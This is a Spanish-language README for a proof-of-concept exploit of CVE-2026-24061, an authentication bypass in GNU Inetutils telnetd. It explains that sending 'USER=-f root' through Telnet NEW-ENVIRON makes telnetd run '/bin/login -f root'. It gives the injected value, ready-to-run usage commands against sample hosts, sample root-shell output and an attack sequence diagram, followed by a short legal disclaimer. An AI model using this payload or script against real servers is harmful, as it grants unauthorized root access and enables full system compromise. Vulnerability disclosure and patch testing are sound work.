
Prueba de concepto de explotación para la omisión de autenticación en telnetd de GNU Inetutils (CVE-2026-24061) que genera un shell root mediante la variable USER de NEW-ENVIRON manipulada.
Este repositorio contiene un exploit de Prueba de Concepto para la vulnerabilidad de omisión de autenticación remota en GNU Inetutils telnetd.
El problema surge porque telnetd no sanea adecuadamente la variable de entorno USER recibida a través de la negociación Telnet NEW‑ENVIRON antes de invocar a /bin/login.
Al proporcionar:
USER=-f root
telnetd ejecuta efectivamente:
/bin/login -f root
lo que omite la autenticación y genera un shell root inmediato.
Telnet NEW‑ENVIRON permite a los clientes establecer variables de entorno durante la negociación de la sesión.
El telnetd vulnerable pasa USER directamente a login:
/bin/login -f "$USER"
Un atacante establece:
USER=-f root
Resultado:
/bin/login -f root
La bandera -f indica a login que omita la autenticación, otorgando acceso root.
No se requieren dependencias externas.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
Si es vulnerable:
# id
uid=0(root) gid=0(root)
#
Ahora tienes un shell root interactivo.
python3 cve-2026-24061.py 10.10.10.20
Salida:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Atacante
participant T as telnetd objetivo
participant L as /bin/login
participant R as Shell root
A->>T: Conectar TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Ejecutar /bin/login -f root
L-->>T: Omisión de autenticación exitosa
T-->>R: Generar shell root
R-->>A: Sesión root interactiva
Este exploit se proporciona para:
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.